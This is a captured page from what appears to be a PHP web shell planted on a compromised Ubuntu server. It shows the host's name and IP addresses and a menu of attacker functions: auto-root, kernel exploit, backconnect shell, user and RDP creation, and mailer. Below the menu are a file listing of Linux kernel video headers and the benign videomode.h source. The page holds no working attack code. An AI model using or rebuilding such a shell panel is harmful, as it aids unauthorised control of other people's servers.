Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-213 /
include /
video /
[ HOME SHELL ]
Name
Size
Permission
Action
atmel_lcdc.h
6.8
KB
-rw-r--r--
aty128.h
13.27
KB
-rw-r--r--
auo_k190xfb.h
2.79
KB
-rw-r--r--
broadsheetfb.h
2.12
KB
-rw-r--r--
cirrus.h
5.67
KB
-rw-r--r--
cvisionppc.h
1.54
KB
-rw-r--r--
da8xx-fb.h
1.99
KB
-rw-r--r--
display_timing.h
3.11
KB
-rw-r--r--
edid.h
228
B
-rw-r--r--
exynos5433_decon.h
6.82
KB
-rw-r--r--
exynos7_decon.h
10.9
KB
-rw-r--r--
gbe.h
10.54
KB
-rw-r--r--
hecubafb.h
1.5
KB
-rw-r--r--
ili9320.h
5.8
KB
-rw-r--r--
imx-ipu-image-convert.h
6.97
KB
-rw-r--r--
imx-ipu-v3.h
14.88
KB
-rw-r--r--
kyro.h
2.36
KB
-rw-r--r--
mach64.h
47.14
KB
-rw-r--r--
maxinefb.h
1.24
KB
-rw-r--r--
mbxfb.h
2.16
KB
-rw-r--r--
metronomefb.h
1.48
KB
-rw-r--r--
mipi_display.h
4.52
KB
-rw-r--r--
mmp_disp.h
7.61
KB
-rw-r--r--
neomagic.h
4.9
KB
-rw-r--r--
newport.h
18.68
KB
-rw-r--r--
of_display_timing.h
968
B
-rw-r--r--
of_videomode.h
367
B
-rw-r--r--
omap-panel-data.h
2.18
KB
-rw-r--r--
omapfb_dss.h
23.44
KB
-rw-r--r--
omapvrfb.h
2.38
KB
-rw-r--r--
permedia2.h
8.96
KB
-rw-r--r--
platform_lcd.h
589
B
-rw-r--r--
pm3fb.h
45.31
KB
-rw-r--r--
pmag-ba-fb.h
1.02
KB
-rw-r--r--
pmagb-b-fb.h
2.34
KB
-rw-r--r--
pxa168fb.h
2.67
KB
-rw-r--r--
radeon.h
109.21
KB
-rw-r--r--
s1d13xxxfb.h
9.95
KB
-rw-r--r--
sa1100fb.h
1.26
KB
-rw-r--r--
samsung_fimd.h
16.8
KB
-rw-r--r--
sh_mobile_lcdc.h
6.11
KB
-rw-r--r--
sh_mobile_meram.h
2.44
KB
-rw-r--r--
sisfb.h
1.23
KB
-rw-r--r--
sstfb.h
11.04
KB
-rw-r--r--
tdfx.h
5.32
KB
-rw-r--r--
tgafb.h
6.94
KB
-rw-r--r--
trident.h
3.23
KB
-rw-r--r--
udlfb.h
2.85
KB
-rw-r--r--
uvesafb.h
2.85
KB
-rw-r--r--
vga.h
13.72
KB
-rw-r--r--
videomode.h
1.35
KB
-rw-r--r--
w100fb.h
3.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : videomode.h
/* * Copyright 2012 Steffen Trumtrar <s.trumtrar@pengutronix.de> * * generic videomode description * * This file is released under the GPLv2 */ #ifndef __LINUX_VIDEOMODE_H #define __LINUX_VIDEOMODE_H #include <linux/types.h> #include <video/display_timing.h> /* * Subsystem independent description of a videomode. * Can be generated from struct display_timing. */ struct videomode { unsigned long pixelclock; /* pixelclock in Hz */ u32 hactive; u32 hfront_porch; u32 hback_porch; u32 hsync_len; u32 vactive; u32 vfront_porch; u32 vback_porch; u32 vsync_len; enum display_flags flags; /* display flags */ }; /** * videomode_from_timing - convert display timing to videomode * @dt: display_timing structure * @vm: return value * * DESCRIPTION: * This function converts a struct display_timing to a struct videomode. */ void videomode_from_timing(const struct display_timing *dt, struct videomode *vm); /** * videomode_from_timings - convert one display timings entry to videomode * @disp: structure with all possible timing entries * @vm: return value * @index: index into the list of display timings in devicetree * * DESCRIPTION: * This function converts one struct display_timing entry to a struct videomode. */ int videomode_from_timings(const struct display_timings *disp, struct videomode *vm, unsigned int index); #endif
Close